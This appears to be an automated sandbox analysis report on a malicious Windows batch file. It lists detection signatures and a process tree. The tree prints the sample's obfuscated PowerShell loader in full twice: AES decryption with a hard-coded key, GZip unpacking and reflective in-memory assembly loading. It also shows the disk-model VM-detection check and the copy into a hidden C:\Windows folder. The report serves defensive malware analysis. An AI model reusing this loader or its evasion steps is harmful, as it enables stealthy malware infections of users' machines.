Windows
Analysis Report
x.bat
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign process
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 2084 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 5752 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- findstr.exe (PID: 1852 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
- cmd.exe (PID: 3592 cmdline: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- powershell.exe (PID: 3524 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- dllhost.exe (PID: 5016 cmdline: C:\Windows\System32\dllhost.exe /Processid:{6e38c76f-48eb-487e-9cfd-6176ccb652b5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
- winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
- dllhost.exe (PID: 412 cmdline: C:\Windows\System32\dllhost.exe /Processid:{5004adc4-d516-4ec2-8626-9598e9dad3bc} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
- svchost.exe (PID: 2036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- spoolsv.exe (PID: 1932 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
- svchost.exe (PID: 2064 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 2152 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
- svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
- svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1724 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1824 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1840 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1940 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1948 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1956 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cmd.exe (PID: 6756 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\x.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 4088 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 6996 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- findstr.exe (PID: 6072 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
- cmd.exe (PID: 1368 cmdline: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- powershell.exe (PID: 4544 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
- schtasks.exe (PID: 6816 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- IfMUlU.exe (PID: 6964 cmdline: "C:\Windows\$nya-onimai2\IfMUlU.exe" MD5: B943A57BDF1BBD9C33AB0D33FF885983)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | 
System Summary
Source: | Author: Florian Roth (Nextron Systems)